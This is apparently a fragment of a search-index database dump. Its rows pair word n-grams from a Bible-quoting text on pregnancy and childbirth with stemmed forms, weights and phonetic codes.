(221662, 'destiny and great', 'destini and great', 0, 1, 1.5667, 'D2353263', 1, '*'),
(221663, 'deut', 'deut', 0, 0, 0.2667, 'D000', 2, '*'),
(221664, 'deut 28', 'deut 28', 0, 1, 1.2333, 'D000', 1, '*'),
(221665, 'deut 28 4,11a', 'deut 28 4,11a', 0, 1, 1.4333, 'D000', 1, '*'),
(221666, 'did see', 'did see', 0, 1, 1.2333, 'D200', 1, '*'),
(221667, 'did see my', 'did see my', 0, 1, 1.3333, 'D250', 1, '*'),
(221668, 'difficult things', 'difficult things', 0, 1, 1.5333, 'D124352', 1, '*'),
(221669, 'difficult things easy', 'difficult things easy', 0, 1, 1.7, 'D124352', 1, '*'),
(221670, 'dilation', 'dilat', 0, 0, 0.5333, 'D435', 1, '*'),
(221671, 'dilation my', 'dilat my', 0, 1, 1.3667, 'D435', 1, '*'),
(221672, 'dilation my womb', 'dilat my womb', 0, 1, 1.5333, 'D4351', 1, '*'),
(221673, 'do a', 'do a', 0, 1, 1.1333, 'D000', 1, '*'),
(221674, 'do a neat', 'do a neat', 0, 1, 1.3, 'D530', 1, '*'),
(221675, 'do according', 'do according', 0, 1, 1.4, 'D26352', 1, '*'),
(221676, 'do according to', 'do according to', 0, 1, 1.5, 'D263523', 1, '*'),
(221677, 'do all things', 'do all things', 0, 1, 1.4333, 'D4352', 1, '*'),
(221678, 'do i', 'do i', 0, 1, 1.1333, 'D000', 1, '*'),
(221679, 'do well', 'do well', 0, 1, 1.2333, 'D400', 1, '*'),
(221680, 'do well no', 'do well no', 0, 1, 1.3333, 'D450', 1, '*'),
(221681, 'do well phil', 'do well phil', 0, 1, 1.4, 'D414', 1, '*'),
(221682, 'doctors', 'doctor', 0, 0, 0.4667, 'D2362', 1, '*'),
(221683, 'doctors and', 'doctor and', 0, 1, 1.3667, 'D236253', 1, '*'),
(221684, 'doctors and everyone', 'doctor and everyone', 0, 1, 1.6667, 'D236253165', 1, '*'),
(221685, 'doeth', 'doeth', 0, 0, 0.3333, 'D000', 2, '*'),
(221686, 'doeth shall', 'doeth shall', 0, 1, 1.3667, 'D240', 1, '*'),
(221687, 'doeth shall prosper', 'doeth shall prosper', 0, 1, 1.6333, 'D2416216', 1, '*'),
(221688, 'during', 'dure', 0, 0, 0.4, 'D652', 3, '*'),
(221689, 'during and', 'dure and', 0, 1, 1.3333, 'D65253', 1, '*'),
(221690, 'during and after', 'dure and after', 0, 1, 1.5333, 'D65253136', 1, '*'),
(221691, 'during my', 'dure my', 0, 1, 1.3, 'D6525', 1, '*'),
(221692, 'during my delivery', 'dure my delivery', 0, 1, 1.6, 'D65253416', 1, '*'),
(221693, 'ear', 'ear', 0, 0, 0.2, 'E600', 1, '*'),
(221694, 'ear unto', 'ear unto', 0, 1, 1.2667, 'E653', 1, '*'),
(221695, 'ear unto my', 'ear unto my', 0, 1, 1.3667, 'E6535', 1, '*'),
(221696, 'early', 'earli', 0, 0, 0.3333, 'E640', 2, '*'),
(221697, 'early morning', 'earli morning', 0, 1, 1.4333, 'E645652', 1, '*'),
(221698, 'early morning sickness', 'earli morning sickness', 0, 1, 1.7333, 'E64565252', 1, '*'),
(221699, 'ears babe', 'ear babe', 0, 1, 1.3, 'E621', 1, '*'),
(221700, 'ears babe leaped', 'ear babe leaped', 0, 1, 1.5333, 'E621413', 1, '*'),
(221701, 'earth be made', 'earth be made', 0, 1, 1.4333, 'E63153', 1, '*'),
(221702, 'earth.”', 'earth.”', 0, 0, 0.4667, 'E630', 1, '*'),
(221703, 'earth.” 16', 'earth.” 16', 0, 1, 1.3333, 'E630', 1, '*'),
(221704, 'earth.” 16 “thine', 'earth.” 16 “thine', 0, 1, 1.5667, 'E635', 1, '*'),
(221705, 'easy for me', 'easi for me', 0, 1, 1.3667, 'E2165', 1, '*'),
(221706, 'easy gen', 'easi gen', 0, 1, 1.2667, 'E250', 1, '*'),
(221707, 'easy gen 35', 'easi gen 35', 0, 1, 1.3667, 'E250', 1, '*'),
(221708, 'egyptian women', 'egyptian women', 0, 1, 1.4667, 'E2135', 1, '*'),
(221709, 'egyptian women for', 'egyptian women for', 0, 1, 1.6, 'E213516', 1, '*'),
(221710, 'ejection', 'eject', 0, 0, 0.5333, 'E235', 1, '*'),
(221711, 'ejection with', 'eject with', 0, 1, 1.4333, 'E2353', 1, '*'),
(221712, 'ejection with pitosin', 'eject with pitosin', 0, 1, 1.7, 'E23531325', 1, '*'),
(221713, 'empowered to', 'empow to', 0, 1, 1.4, 'E5163', 1, '*'),
(221714, 'empowered to do', 'empow to do', 0, 1, 1.5, 'E5163', 1, '*'),
(221715, 'ere', 'er', 0, 0, 0.2, 'E600', 1, '*'),
(221716, 'ere the', 'er the', 0, 1, 1.2333, 'E630', 1, '*'),
(221717, 'ere the midwives', 'er the midwives', 0, 1, 1.5333, 'E635312', 1, '*'),
(221718, 'eve his', 'ev his', 0, 1, 1.2333, 'E120', 1, '*'),
(221719, 'eve his wife', 'ev his wife', 0, 1, 1.4, 'E121', 1, '*'),
(221720, 'even start', 'even start', 0, 1, 1.3333, 'E152363', 1, '*'),
(221721, 'even start before', 'even start before', 0, 1, 1.5667, 'E15236316', 1, '*'),
(221722, 'evening', 'even', 0, 0, 0.4667, 'E152', 1, '*'),
(221723, 'evening it', 'even it', 0, 1, 1.3333, 'E1523', 1, '*'),
(221724, 'evening it can', 'even it can', 0, 1, 1.4667, 'E152325', 1, '*'),
(221725, 'every delay', 'everi delay', 0, 1, 1.3667, 'E1634', 1, '*'),
(221726, 'every delay at', 'everi delay at', 0, 1, 1.4667, 'E16343', 1, '*'),
(221727, 'every hard', 'everi hard', 0, 1, 1.3333, 'E163', 1, '*'),
(221728, 'every hard labor', 'everi hard labor', 0, 1, 1.5333, 'E163416', 1, '*'),
(221729, 'every one that', 'everi one that', 0, 1, 1.4667, 'E1653', 1, '*'),
(221730, 'everyone conceived', 'everyon conceived', 0, 1, 1.6, 'E16525213', 1, '*'),
(221731, 'everyone conceived and', 'everyon conceived and', 0, 1, 1.7333, 'E1652521353', 1, '*'),
(221732, 'everyone that will', 'everyon that will', 0, 1, 1.6, 'E16534', 1, '*'),
(221733, 'ex', 'ex', 0, 0, 0.1333, 'E200', 1, '*'),
(221734, 'ex 1', 'ex 1', 0, 1, 1.1333, 'E200', 1, '*'),
(221735, 'ex 1 19-”and', 'ex 1 19-”and', 0, 1, 1.4, 'E253', 1, '*'),
(221736, 'ex 2', 'ex 2', 0, 1, 1.1333, 'E200', 1, '*'),
(221737, 'ex 2 2b', 'ex 2 2b', 0, 1, 1.2333, 'E210', 1, '*'),
(221738, 'ex 23', 'ex 23', 0, 1, 1.1667, 'E200', 1, '*'),
(221739, 'ex 23 26', 'ex 23 26', 0, 1, 1.2667, 'E200', 1, '*'),
(221740, 'ex.2', 'ex.2', 0, 0, 0.2667, 'E200', 1, '*'),
(221741, 'ex.2 29', 'ex.2 29', 0, 1, 1.2333, 'E200', 1, '*'),
(221742, 'ex.2 29 i', 'ex.2 29 i', 0, 1, 1.3, 'E200', 1, '*'),
(221743, 'experience formed', 'experi formed', 0, 1, 1.5667, 'E216521653', 1, '*'),
(221744, 'experience formed by', 'experi formed by', 0, 1, 1.6667, 'E2165216531', 1, '*'),
(221745, 'eyes did', 'ey did', 0, 1, 1.2667, 'E230', 1, '*'),
(221746, 'eyes did see', 'ey did see', 0, 1, 1.4, 'E232', 1, '*'),
(221747, 'eyes keep', 'ey keep', 0, 1, 1.3, 'E210', 1, '*'),
(221748, 'eyes keep them', 'ey keep them', 0, 1, 1.4667, 'E2135', 1, '*'),
(221749, 'fainting', 'faint', 0, 0, 0.5333, 'F5352', 1, '*'),
(221750, 'fainting and', 'faint and', 0, 1, 1.4, 'F535253', 1, '*'),
(221751, 'fainting and being', 'faint and being', 0, 1, 1.6, 'F535253152', 1, '*'),
(221752, 'fashioned', 'fashion', 0, 0, 0.6, 'F253', 1, '*'),
(221753, 'fashioned when', 'fashion when', 0, 1, 1.4667, 'F2535', 1, '*'),
(221754, 'fashioned when as', 'fashion when as', 0, 1, 1.5667, 'F25352', 1, '*'),
(221755, 'fear not', 'fear not', 0, 1, 1.2667, 'F653', 1, '*'),
(221756, 'fear not i', 'fear not i', 0, 1, 1.3333, 'F653', 1, '*'),
(221757, 'fear not thou', 'fear not thou', 0, 1, 1.4333, 'F653', 1, '*'),
(221758, 'fearfully', 'fearfulli', 0, 0, 0.6, 'F614', 1, '*'),
(221759, 'fearfully and', 'fearfulli and', 0, 1, 1.4333, 'F61453', 1, '*'),
(221760, 'fearfully and wonderfully', 'fearfulli and wonderfully', 0, 1, 1.8333, 'F6145353614', 1, '*'),
(221761, 'filled with the', 'fill with the', 0, 1, 1.5, 'F430', 1, '*'),
(221762, 'find them', 'find them', 0, 1, 1.3, 'F535', 1, '*'),
(221763, 'find them and', 'find them and', 0, 1, 1.4333, 'F5353', 1, '*'),
(221764, 'flesh remain', 'flesh remain', 0, 1, 1.4, 'F4265', 1, '*'),
(221765, 'flesh remain blessed', 'flesh remain blessed', 0, 1, 1.6667, 'F42651423', 1, '*'),
(221766, 'for as', 'for as', 0, 1, 1.2, 'F620', 1, '*'),
(221767, 'for as soon', 'for as soon', 0, 1, 1.3667, 'F625', 1, '*'),
(221768, 'for i am', 'for i am', 0, 1, 1.2667, 'F650', 1, '*'),
(221769, 'for it is', 'for it is', 0, 1, 1.3, 'F632', 1, '*'),
(221770, 'for joy.”', 'for joy.”', 0, 1, 1.3, 'F620', 1, '*'),
(221771, 'for joy.” my', 'for joy.” my', 0, 1, 1.4, 'F625', 1, '*'),
(221772, 'for me in', 'for me in', 0, 1, 1.3, 'F650', 1, '*'),
(221773, 'for pregnant', 'for pregnant', 0, 1, 1.4, 'F616253', 1, '*'),
(221774, 'for pregnant women', 'for pregnant women', 0, 1, 1.6, 'F6162535', 1, '*'),
(221775, 'for then', 'for then', 0, 1, 1.2667, 'F635', 1, '*'),
(221776, 'for then thou', 'for then thou', 0, 1, 1.4333, 'F6353', 1, '*'),
(221777, 'for they are', 'for they are', 0, 1, 1.4, 'F636', 1, '*'),
(221778, 'for us for', 'for us for', 0, 1, 1.3333, 'F6216', 1, '*'),
(221779, 'forceful', 'forc', 0, 0, 0.5333, 'F6214', 1, '*'),
(221780, 'forceful ejection', 'forc ejection', 0, 1, 1.5667, 'F6214235', 1, '*'),
(221781, 'forceful ejection with', 'forc ejection with', 0, 1, 1.7333, 'F62142353', 1, '*'),
(221782, 'formed', 'form', 0, 0, 0.4, 'F653', 3, '*'),
(221783, 'formed by', 'form by', 0, 1, 1.3, 'F6531', 1, '*'),
(221784, 'formed by god', 'form by god', 0, 1, 1.4333, 'F653123', 1, '*'),
(221785, 'forth and', 'forth and', 0, 1, 1.3, 'F6353', 1, '*'),
(221786, 'forth and shut', 'forth and shut', 0, 1, 1.4667, 'F635323', 1, '*'),
(221787, 'forth as', 'forth as', 0, 1, 1.2667, 'F632', 1, '*'),
(221788, 'forth as the', 'forth as the', 0, 1, 1.4, 'F6323', 1, '*'),
(221789, 'forth before', 'forth before', 0, 1, 1.4, 'F6316', 1, '*'),
(221790, 'forth before her', 'forth before her', 0, 1, 1.5333, 'F6316', 1, '*'),
(221791, 'forth children', 'forth children', 0, 1, 1.4667, 'F6324365', 1, '*'),
(221792, 'forth children and', 'forth children and', 0, 1, 1.6, 'F63243653', 1, '*'),
(221793, 'forth her', 'forth her', 0, 1, 1.3, 'F636', 1, '*'),
(221794, 'forth her children.”', 'forth her children.”', 0, 1, 1.6667, 'F63624365', 1, '*'),
(221795, 'forth his fruit', 'forth his fruit', 0, 1, 1.5, 'F632163', 1, '*'),
(221796, 'forth i', 'forth i', 0, 1, 1.2333, 'F630', 1, '*'),
(221797, 'forth i have', 'forth i have', 0, 1, 1.4, 'F631', 1, '*'),
(221798, 'forth in jesus', 'forth in jesus', 0, 1, 1.4667, 'F6352', 1, '*'),
(221799, 'forth in one', 'forth in one', 0, 1, 1.4, 'F635', 1, '*'),
(221800, 'forth saith', 'forth saith', 0, 1, 1.3667, 'F6323', 1, '*'),
(221801, 'forth saith the', 'forth saith the', 0, 1, 1.5, 'F6323', 1, '*'),
(221802, 'forth speedily', 'forth speedily', 0, 1, 1.4667, 'F632134', 1, '*'),
(221803, 'forth speedily and', 'forth speedily and', 0, 1, 1.6, 'F63213453', 1, '*'),
(221804, 'forth speedily i', 'forth speedily i', 0, 1, 1.5333, 'F632134', 1, '*'),
(221805, 'from labor', 'from labor', 0, 1, 1.3333, 'F65416', 1, '*'),
(221806, 'from labor pain', 'from labor pain', 0, 1, 1.5, 'F6541615', 1, '*'),
(221807, 'from me', 'from me', 0, 1, 1.2333, 'F650', 1, '*'),
(221808, 'from me therefore', 'from me therefore', 0, 1, 1.5667, 'F653616', 1, '*'),
(221809, 'from my', 'from my', 0, 1, 1.2333, 'F650', 1, '*'),
(221810, 'from my mother\'s', 'from my mother', 0, 1, 1.5333, 'F65362', 1, '*'),
(221811, 'from my womb', 'from my womb', 0, 1, 1.4, 'F651', 1, '*'),
(221812, 'from the curse', 'from the curse', 0, 1, 1.4667, 'F653262', 1, '*'),
(221813, 'from the lord.”', 'from the lord.”', 0, 1, 1.5, 'F653463', 1, '*'),
(221814, 'from the sorrow', 'from the sorrow', 0, 1, 1.5, 'F65326', 1, '*'),
(221815, 'from the womb', 'from the womb', 0, 1, 1.4333, 'F65351', 1, '*'),
(221816, 'from thee', 'from thee', 0, 1, 1.3, 'F653', 1, '*'),
(221817, 'from thee when', 'from thee when', 0, 1, 1.4667, 'F6535', 1, '*'),
(221818, 'from thine', 'from thine', 0, 1, 1.3333, 'F6535', 1, '*'),
(221819, 'from thine eyes', 'from thine eyes', 0, 1, 1.5, 'F65352', 1, '*'),
(221820, 'fruit in', 'fruit in', 0, 1, 1.2667, 'F635', 1, '*'),
(221821, 'fruit in his', 'fruit in his', 0, 1, 1.4, 'F6352', 1, '*'),
(221822, 'fruit of my', 'fruit of my', 0, 1, 1.3667, 'F6315', 1, '*'),
(221823, 'fruit of thy', 'fruit of thy', 0, 1, 1.4, 'F6313', 1, '*'),
(221824, 'fulfill luke', 'fulfil luke', 0, 1, 1.4, 'F4142', 1, '*'),
(221825, 'fulfill luke 1', 'fulfil luke 1', 0, 1, 1.4667, 'F4142', 1, '*'),
(221826, 'fulfilled behold', 'fulfil behold', 0, 1, 1.5333, 'F4143143', 1, '*'),
(221827, 'fulfilled behold there', 'fulfil behold there', 0, 1, 1.7333, 'F41431436', 1, '*'),
(221828, 'fulfilled in', 'fulfil in', 0, 1, 1.4, 'F41435', 1, '*'),
(221829, 'fulfilled in jesus', 'fulfil in jesus', 0, 1, 1.6, 'F414352', 1, '*'),
(221830, 'full dilation', 'full dilation', 0, 1, 1.4333, 'F43435', 1, '*'),
(221831, 'full dilation my', 'full dilation my', 0, 1, 1.5333, 'F43435', 1, '*'),
(221832, 'fully-developed-baby', 'fully-developed-babi', 0, 0, 1, 'F4314131', 1, '*'),
(221833, 'fully-developed-baby comes', 'fully-developed-babi comes', 0, 1, 1.8667, 'F4314131252', 1, '*'),
(221834, 'fully-developed-baby comes out-by', 'fully-developed-babi comes out-by', 0, 1, 2, 'F431413125231', 1, '*'),
(221835, 'gal 1', 'gal 1', 0, 1, 1.1667, 'G400', 1, '*'),
(221836, 'gal 1 15', 'gal 1 15', 0, 1, 1.2667, 'G400', 1, '*'),
(221837, 'gal 3', 'gal 3', 0, 1, 1.1667, 'G400', 1, '*'),
(221838, 'gal 3 13', 'gal 3 13', 0, 1, 1.2667, 'G400', 1, '*'),
(221839, 'gal 3 29', 'gal 3 29', 0, 1, 1.2667, 'G400', 1, '*'),
(221840, 'gen 16', 'gen 16', 0, 1, 1.2, 'G500', 1, '*'),
(221841, 'gen 16 4', 'gen 16 4', 0, 1, 1.2667, 'G500', 1, '*'),
(221842, 'gen 25', 'gen 25', 0, 1, 1.2, 'G500', 1, '*'),
(221843, 'gen 25 24', 'gen 25 24', 0, 1, 1.3, 'G500', 1, '*'),
(221844, 'gen 29', 'gen 29', 0, 1, 1.2, 'G500', 1, '*'),
(221845, 'gen 29 32', 'gen 29 32', 0, 1, 1.3, 'G500', 1, '*'),
(221846, 'gen 3 16', 'gen 3 16', 0, 1, 1.2667, 'G500', 1, '*'),
(221847, 'gen 30', 'gen 30', 0, 1, 1.2, 'G500', 1, '*'),
(221848, 'gen 30 23', 'gen 30 23', 0, 1, 1.3, 'G500', 1, '*'),
(221849, 'gen 30 5', 'gen 30 5', 0, 1, 1.2667, 'G500', 1, '*'),
(221850, 'gen 35', 'gen 35', 0, 1, 1.2, 'G500', 1, '*'),
(221851, 'gen 35 17-”and', 'gen 35 17-”and', 0, 1, 1.4667, 'G530', 1, '*'),
(221852, 'gen 35 17a', 'gen 35 17a', 0, 1, 1.3333, 'G500', 1, '*'),
(221853, 'gen 35 27b', 'gen 35 27b', 0, 1, 1.3333, 'G510', 1, '*'),
(221854, 'gen 4 1', 'gen 4 1', 0, 1, 1.2333, 'G500', 1, '*'),
(221855, 'gen 4 17', 'gen 4 17', 0, 1, 1.2667, 'G500', 1, '*'),
(221856, 'glory my', 'glori my', 0, 1, 1.2667, 'G465', 1, '*'),
(221857, 'glory my baby', 'glori my baby', 0, 1, 1.4333, 'G4651', 1, '*'),
(221858, 'go before', 'go before', 0, 1, 1.3, 'G160', 1, '*'),
(221859, 'go before thee', 'go before thee', 0, 1, 1.4667, 'G163', 1, '*'),
(221860, 'god depart', 'god depart', 0, 1, 1.3333, 'G3163', 1, '*'),
(221861, 'god depart from', 'god depart from', 0, 1, 1.5, 'G3163165', 1, '*'),
(221862, 'god how', 'god how', 0, 1, 1.2333, 'G300', 1, '*'),
(221863, 'god how great', 'god how great', 0, 1, 1.4333, 'G3263', 1, '*'),
(221864, 'god i come', 'god i come', 0, 1, 1.3333, 'G325', 1, '*'),
(221865, 'god in my', 'god in my', 0, 1, 1.3, 'G350', 1, '*'),
(221866, 'god makes', 'god makes', 0, 1, 1.3, 'G352', 1, '*'),
(221867, 'god makes difficult', 'god makes difficult', 0, 1, 1.6333, 'G35231243', 1, '*'),
(221868, 'god that separates', 'god that separates', 0, 1, 1.6, 'G321632', 1, '*'),
(221869, 'god who separated', 'god who separated', 0, 1, 1.5667, 'G32163', 1, '*'),
(221870, 'god without', 'god without', 0, 1, 1.3667, 'G300', 2, '*'),
(221871, 'god without covenant', 'god without covenant', 0, 1, 1.6667, 'G32153', 1, '*'),
(221872, 'god\'s hands', 'god hands', 0, 1, 1.3667, 'G32532', 1, '*'),
(221873, 'god\'s hands upon', 'god hands upon', 0, 1, 1.5333, 'G3253215', 1, '*'),
(221874, 'good success.”', 'good success.”', 0, 1, 1.4667, 'G320', 1, '*'),
(221875, 'good success.” proverb', 'good success.” proverb', 0, 1, 1.7333, 'G3216161', 1, '*'),
(221876, 'goodly', 'goodli', 0, 0, 0.4, 'G340', 1, '*'),
(221877, 'goodly child', 'goodli child', 0, 1, 1.4, 'G34243', 1, '*'),
(221878, 'goodly child a', 'goodli child a', 0, 1, 1.4667, 'G34243', 1, '*'),
(221879, 'goodly child she', 'goodli child she', 0, 1, 1.5333, 'G342432', 1, '*'),
(221880, 'goods', 'good', 0, 0, 0.3333, 'G320', 1, '*'),
(221881, 'goods in', 'good in', 0, 1, 1.2667, 'G325', 1, '*'),
(221882, 'goods in the', 'good in the', 0, 1, 1.4, 'G3253', 1, '*'),
(221883, 'gotten a', 'gotten a', 0, 1, 1.2667, 'G350', 1, '*'),
(221884, 'gotten a man', 'gotten a man', 0, 1, 1.4, 'G350', 1, '*'),
(221885, 'grace”', 'grace”', 0, 0, 0.4, 'G620', 1, '*'),
(221886, 'grace” i', 'grace” i', 0, 1, 1.2667, 'G620', 1, '*'),
(221887, 'grace” i declare', 'grace” i declare', 0, 1, 1.5333, 'G623246', 1, '*'),
(221888, 'great is', 'great is', 0, 1, 1.2667, 'G632', 1, '*'),
(221889, 'great is the', 'great is the', 0, 1, 1.4, 'G6323', 1, '*'),
(221890, 'great purpose', 'great purpose', 0, 1, 1.4333, 'G631612', 1, '*'),
(221891, 'great purpose who', 'great purpose who', 0, 1, 1.5667, 'G631612', 1, '*'),
(221892, 'greatly', 'greatli', 0, 0, 0.4667, 'G634', 1, '*'),
(221893, 'greatly multiply', 'greatli multiply', 0, 1, 1.5333, 'G63454314', 1, '*'),
(221894, 'greatly multiply thy', 'greatli multiply thy', 0, 1, 1.6667, 'G634543143', 1, '*'),
(221895, 'grows perfectly', 'grow perfectly', 0, 1, 1.5, 'G62161234', 1, '*'),
(221896, 'grows perfectly no', 'grow perfectly no', 0, 1, 1.6, 'G621612345', 1, '*'),
(221897, 'hands upon', 'hand upon', 0, 1, 1.3333, 'H53215', 1, '*'),
(221898, 'hands upon the', 'hand upon the', 0, 1, 1.4667, 'H532153', 1, '*'),
(221899, 'hangeth', 'hangeth', 0, 0, 0.4667, 'H523', 1, '*'),
(221900, 'hangeth on', 'hangeth on', 0, 1, 1.3333, 'H5235', 1, '*'),
(221901, 'hangeth on a', 'hangeth on a', 0, 1, 1.4, 'H5235', 1, '*'),
(221902, 'harassment', 'harass', 0, 0, 0.6667, 'H6253', 1, '*'),
(221903, 'harassment psalm', 'harass psalm', 0, 1, 1.5333, 'H62531245', 1, '*'),
(221904, 'harassment psalm 139', 'harass psalm 139', 0, 1, 1.6667, 'H62531245', 1, '*'),
(221905, 'hard labor', 'hard labor', 0, 1, 1.3333, 'H63416', 1, '*'),
(221906, 'hard labor ..”', 'hard labor ..”', 0, 1, 1.4667, 'H63416', 1, '*'),
(221907, 'hard labor during', 'hard labor during', 0, 1, 1.5667, 'H634163652', 1, '*'),
(221908, 'hard labor that', 'hard labor that', 0, 1, 1.5, 'H634163', 1, '*'),
(221909, 'has redeemed', 'ha redeemed', 0, 1, 1.4, 'H26353', 1, '*'),
(221910, 'has redeemed me', 'ha redeemed me', 0, 1, 1.5, 'H263535', 1, '*'),
(221911, 'hast covered', 'hast covered', 0, 1, 1.4, 'H232163', 1, '*'),
(221912, 'hast covered me', 'hast covered me', 0, 1, 1.5, 'H2321635', 1, '*'),
(221913, 'hast possessed', 'hast possessed', 0, 1, 1.4667, 'H23123', 1, '*'),
(221914, 'hast possessed my', 'hast possessed my', 0, 1, 1.5667, 'H231235', 1, '*'),
(221915, 'hath heard', 'hath heard', 0, 1, 1.3333, 'H363', 1, '*'),
(221916, 'hath heard such', 'hath heard such', 0, 1, 1.5, 'H3632', 1, '*'),
(221917, 'hath redeemed', 'hath redeemed', 0, 1, 1.4333, 'H36353', 1, '*'),
(221918, 'hath redeemed us', 'hath redeemed us', 0, 1, 1.5333, 'H363532', 1, '*'),
(221919, 'hath seen', 'hath seen', 0, 1, 1.3, 'H325', 1, '*'),
(221920, 'hath seen such', 'hath seen such', 0, 1, 1.4667, 'H3252', 1, '*'),
(221921, 'have are', 'have are', 0, 1, 1.2667, 'H160', 1, '*'),
(221922, 'have are alive', 'have are alive', 0, 1, 1.4667, 'H1641', 1, '*'),
(221923, 'have full', 'have full', 0, 1, 1.3, 'H140', 1, '*'),
(221924, 'have full dilation', 'have full dilation', 0, 1, 1.6, 'H143435', 1, '*'),
(221925, 'have good success.”', 'have good success.”', 0, 1, 1.6333, 'H1232', 1, '*'),
(221926, 'have gotten a', 'have gotten a', 0, 1, 1.4333, 'H1235', 1, '*'),
(221927, 'have no', 'have no', 0, 1, 1.2333, 'H150', 1, '*'),
(221928, 'have no pains', 'have no pains', 0, 1, 1.4333, 'H15152', 1, '*'),
(221929, 'have short', 'have short', 0, 1, 1.3333, 'H1263', 1, '*'),
(221930, 'have short labour', 'have short labour', 0, 1, 1.5667, 'H1263416', 1, '*'),
(221931, 'have this', 'have this', 0, 1, 1.3, 'H132', 1, '*'),
(221932, 'have this son', 'have this son', 0, 1, 1.4333, 'H1325', 1, '*'),
(221933, 'he doeth', 'he doeth', 0, 1, 1.2667, 'H300', 1, '*'),
(221934, 'he doeth shall', 'he doeth shall', 0, 1, 1.4667, 'H324', 1, '*'),
(221935, 'he said', 'he said', 0, 1, 1.2333, 'H230', 3, '*'),
(221936, 'he said i', 'he said i', 0, 1, 1.3, 'H230', 1, '*'),
(221937, 'he shall be', 'he shall be', 0, 1, 1.3667, 'H241', 1, '*'),
(221938, 'he shall rule', 'he shall rule', 0, 1, 1.4333, 'H2464', 1, '*'),
(221939, 'he was a', 'he was a', 0, 1, 1.2667, 'H200', 2, '*'),
(221940, 'he\'ll do a', 'he do a', 0, 1, 1.3333, 'H430', 1, '*'),
(221941, 'health shall', 'health shall', 0, 1, 1.4, 'H4324', 1, '*'),
(221942, 'health shall spring', 'health shall spring', 0, 1, 1.6333, 'H432421652', 1, '*'),
(221943, 'health spring', 'health spring', 0, 1, 1.4333, 'H4321652', 1, '*'),
(221944, 'health spring forth', 'health spring forth', 0, 1, 1.6333, 'H4321652163', 1, '*'),
(221945, 'health to', 'health to', 0, 1, 1.3, 'H430', 1, '*'),
(221946, 'health to all', 'health to all', 0, 1, 1.4333, 'H434', 1, '*'),
(221947, 'healthy', 'healthi', 0, 0, 0.4667, 'H430', 1, '*'),
(221948, 'healthy and', 'healthi and', 0, 1, 1.3667, 'H4353', 1, '*'),
(221949, 'healthy and strong', 'healthi and strong', 0, 1, 1.6, 'H435323652', 1, '*'),
(221950, 'heard such', 'heard such', 0, 1, 1.3333, 'H632', 1, '*'),
(221951, 'heard such a', 'heard such a', 0, 1, 1.4, 'H632', 1, '*'),
(221952, 'heart 22 for', 'heart 22 for', 0, 1, 1.4, 'H6316', 1, '*'),
(221953, 'hebrew', 'hebrew', 0, 0, 0.4, 'H160', 1, '*'),
(221954, 'hebrew woman', 'hebrew woman', 0, 1, 1.4, 'H165', 1, '*'),
(221955, 'hebrew woman gal', 'hebrew woman gal', 0, 1, 1.5333, 'H16524', 1, '*'),
(221956, 'hebrew women', 'hebrew women', 0, 1, 1.4, 'H165', 1, '*'),
(221957, 'hebrew women are', 'hebrew women are', 0, 1, 1.5333, 'H1656', 1, '*'),
(221958, 'her children.”', 'her children.”', 0, 1, 1.4667, 'H624365', 1, '*'),
(221959, 'her children.” i', 'her children.” i', 0, 1, 1.5333, 'H624365', 1, '*'),
(221960, 'her consolations', 'her consolations', 0, 1, 1.5333, 'H62524352', 1, '*'),
(221961, 'her consolations that', 'her consolations that', 0, 1, 1.7, 'H625243523', 1, '*'),
(221962, 'her days', 'her days', 0, 1, 1.2667, 'H632', 1, '*'),
(221963, 'her days to', 'her days to', 0, 1, 1.3667, 'H6323', 1, '*'),
(221964, 'her fear', 'her fear', 0, 1, 1.2667, 'H616', 1, '*'),
(221965, 'her fear not', 'her fear not', 0, 1, 1.4, 'H61653', 1, '*'),
(221966, 'her glory', 'her glory', 0, 1, 1.3, 'H6246', 1, '*'),
(221967, 'her glory my', 'her glory my', 0, 1, 1.4, 'H62465', 1, '*'),
(221968, 'her pain', 'her pain', 0, 1, 1.2667, 'H615', 1, '*'),
(221969, 'her pain came', 'her pain came', 0, 1, 1.4333, 'H61525', 1, '*'),
(221970, 'her womb.”', 'her womb.”', 0, 1, 1.3333, 'H651', 1, '*'),
(221971, 'her womb.” my', 'her womb.” my', 0, 1, 1.4333, 'H6515', 1, '*'),
(221972, 'herself', 'herself', 0, 0, 0.4667, 'H6241', 1, '*'),
(221973, 'herself out', 'herself out', 0, 1, 1.3667, 'H62413', 1, '*'),
(221974, 'herself out of', 'herself out of', 0, 1, 1.4667, 'H624131', 1, '*'),
(221975, 'hid', 'hid', 0, 0, 0.2, 'H300', 1, '*'),
(221976, 'hid from', 'hid from', 0, 1, 1.2667, 'H3165', 1, '*'),
(221977, 'hid from thee', 'hid from thee', 0, 1, 1.4333, 'H31653', 1, '*'),
(221978, 'hid him', 'hid him', 0, 1, 1.2333, 'H350', 1, '*'),
(221979, 'hid him three', 'hid him three', 0, 1, 1.4333, 'H3536', 1, '*'),
(221980, 'him that he', 'him that he', 0, 1, 1.3667, 'H530', 1, '*'),
(221981, 'him three', 'him three', 0, 1, 1.3, 'H536', 1, '*'),
(221982, 'him three months.”', 'him three months.”', 0, 1, 1.6, 'H536532', 1, '*'),
(221983, 'himself herself', 'himself herself', 0, 1, 1.5, 'H52416241', 1, '*'),
(221984, 'himself herself out', 'himself herself out', 0, 1, 1.6333, 'H524162413', 1, '*'),
(221985, 'his fruit', 'hi fruit', 0, 1, 1.3, 'H2163', 1, '*'),
(221986, 'his fruit in', 'hi fruit in', 0, 1, 1.4, 'H21635', 1, '*'),
(221987, 'his grace”', 'hi grace”', 0, 1, 1.3333, 'H262', 1, '*'),
(221988, 'his grace” i', 'hi grace” i', 0, 1, 1.4, 'H262', 1, '*'),
(221989, 'his leaf', 'hi leaf', 0, 1, 1.2667, 'H241', 1, '*'),
(221990, 'his leaf also', 'hi leaf also', 0, 1, 1.4333, 'H24142', 1, '*'),
(221991, 'his season', 'hi season', 0, 1, 1.3333, 'H250', 1, '*'),
(221992, 'his season his', 'hi season his', 0, 1, 1.4667, 'H252', 1, '*'),
(221993, 'his wife and', 'hi wife and', 0, 1, 1.4, 'H2153', 1, '*'),
(221994, 'holy spirit from', 'holi spirit from', 0, 1, 1.5333, 'H42163165', 1, '*'),
(221995, 'house and to', 'hous and to', 0, 1, 1.4, 'H253', 1, '*'),
(221996, 'how great', 'how great', 0, 1, 1.3, 'H263', 1, '*'),
(221997, 'how great is', 'how great is', 0, 1, 1.4, 'H2632', 1, '*'),
(221998, 'husband and', 'husband and', 0, 1, 1.3667, 'H215353', 1, '*'),
(221999, 'husband and he', 'husband and he', 0, 1, 1.4667, 'H215353', 1, '*'),
(222000, 'i am a', 'i am a', 0, 1, 1.2, 'I500', 2, '*'),
